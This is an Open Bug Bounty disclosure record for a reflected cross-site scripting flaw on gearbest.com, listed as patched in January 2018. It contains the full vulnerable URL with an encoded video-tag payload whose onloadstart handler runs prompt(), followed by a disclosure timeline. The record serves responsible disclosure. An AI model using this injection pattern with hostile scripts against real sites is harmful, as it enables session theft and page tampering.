Vulnerable URL:
https://www.gearbest.com/memory/invalid/test%22/%3E%3Cvideo%20controls%20onloadstart=%22prompt('OPENBUGBOUNTY')%22%3E%20%3Csource%20src=%22https://www.w3schools.com/jsref/mov_bbb.mp4%22%20type=%22video/mp4%22%3E%20%3Csource%20src=%22mov_bbb.ogg%22%20type=%22video/ogg%22%3E%20Your%20browser%20does%20not%20support%20HTML5%20video.%20%3C/video%3E/pp_718136.html
Details:
Description |
Value |
Patched: |
Yes, at |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
291 |
VIP website status: |
Yes |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
16 October, 2017 09:30 GMT |
Generic security notifications sent to website owner |
16 October, 2017 09:33 GMT |
Notification sent to subscribers (without technical details) |
16 October, 2017 10:17 GMT |
Vulnerability details disclosed by researcher |
14 January, 2018 10:19 GMT |
Vulnerability patched by the website owner |
15 January, 2018 02:38 GMT |